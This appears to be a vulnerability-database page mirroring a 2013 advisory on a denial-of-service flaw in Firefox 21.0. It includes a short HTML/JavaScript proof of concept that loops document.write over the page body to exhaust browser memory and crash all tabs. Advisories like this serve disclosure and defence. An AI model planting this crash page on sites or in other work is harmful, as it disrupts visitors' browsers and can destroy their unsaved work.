Lucene search
+L

Mozilla Firefox 21.0 Denial Of Service

🗓️ 22 Jun 2013 00:00:00Reported by JigsawType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Mozilla Firefox 21.0 Remote Denial Of Service Vulnerabilit

Code
`Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service   
Author : Jigsaw (Abdelmorite Eljoaydi)  
Date : 22-06-2013  
E-mail : [email protected]  
Home : Morroco   
Facebook page : facebook.com/abdelmorit.alma  
platform : software  
Impact : Denial Of Service ( all tabs are no longer accessible, your work might be lost)  
Tested on : Mozilla Firefox 21.0 the latest release  
OS : Tested on Windows 7/ Windows XP   
Risk : Low[+] / Medium[-]  
  
  
===========================================================================================  
#Vulnerability:  
  
This bug is a typical result of endless dialog loop.  
The flaw exists when the attacker put document.write(document.body.innerHTML)  
in multitudinous loop that make the browser Unable to handle this exception and fall in Out of Memory.  
User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.  
  
============================================================================================  
#Proof of Concept:  
  
<html>  
<body>  
<script>  
document.write("")  
</script>  
</body>  
<script>  
for (i=0;i<=99;i++)  
{  
document.write(document.body.innerHTML);  
}  
  
</script>  
</html>  
================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2013 00:00Current
7.4High risk
Vulners AI Score7.4
15